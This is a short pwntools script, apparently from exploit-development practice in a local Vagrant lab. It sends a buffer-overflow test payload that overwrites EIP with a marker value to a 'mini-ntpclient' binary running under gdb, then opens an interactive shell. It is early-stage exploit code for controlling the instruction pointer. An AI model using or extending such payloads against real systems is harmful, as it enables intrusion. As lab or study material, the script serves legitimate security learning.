from pwn import * import base64 context.update(arch='i386', os='linux') # Connect to the server with SSH ssh_connection = ssh('vagrant', 'default', port=2222) # Open a shell to write more stuff to bash = ssh_connection.run('bash') #crash_at = 0x12c crash_at = 264 eip_crash = 0x61616663 eip_crash_buffer = cyclic_find(eip_crash) # Create a test payload which writes up to the EIP with A's, writes over the EIP with B's and then writes C's payload = 'A' * eip_crash_buffer + ('B' * 4) + ('C' * (crash_at - eip_crash_buffer - 4)) # Send the payload bash.sendline('gdb /vagrant/mini-ntpclient') bash.sendline('run '+ str(payload)) # Hand an interactive shell back to the user bash.interactive()